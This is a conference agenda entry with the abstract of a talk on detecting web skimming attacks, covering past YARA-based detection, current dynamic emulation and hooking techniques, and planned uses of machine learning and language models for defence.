Skip to main content
back to agenda
on this page

Hunting Web Skimmers: Past, Present and Future

  • 16:20
  • Tue
  • 14 Nov
Briefing Stage 4


Web skimming attacks have risen as a significant threat to web security, leading to the interception of sensitive user data and financial information. Notably, these attacks have resulted in highly publicized incidents such as British Airways, Newegg, and TicketMaster, affecting hundreds of thousands of victims. As the frequency of such attacks continues to escalate, web skimmers are demonstrating an increasing adaptability, constantly evolving their techniques to evade various forms of detection. In response to this dynamic landscape, our presentation delves into a comprehensive exploration of our past methodologies, ongoing innovations, and future prospects of combating these threats.

In the past, our web skimming detection relied on probe filtering and manually created YARA rules. Our approach effectively identified various web skimmer families, yielding significant findings including the exposure of some high-profile cases involving a prominent e-commerce website in Central and Eastern European markets. However, the relentless evolution of web skimmers has rendered traditional YARA rules insufficient. 

In the present, our response has evolved. We've embraced advanced static methods and innovative dynamic emulation and hooking techniques to detect web skimmers and intercept their exfiltration gates. Our dynamic emulation engine intricately mimics user interactions, inciting malicious web skimmer behaviors that remain latent within standard dynamic detection environments.  

In anticipation of forthcoming challenges, we investigate the role of Machine Learning (ML) and Large Language Model (LLM) in our advanced defense strategies. Our exploration encompasses anomaly detection and the potential of pattern recognition as well as the insight for making use of LLM against evolving web skimming tactics.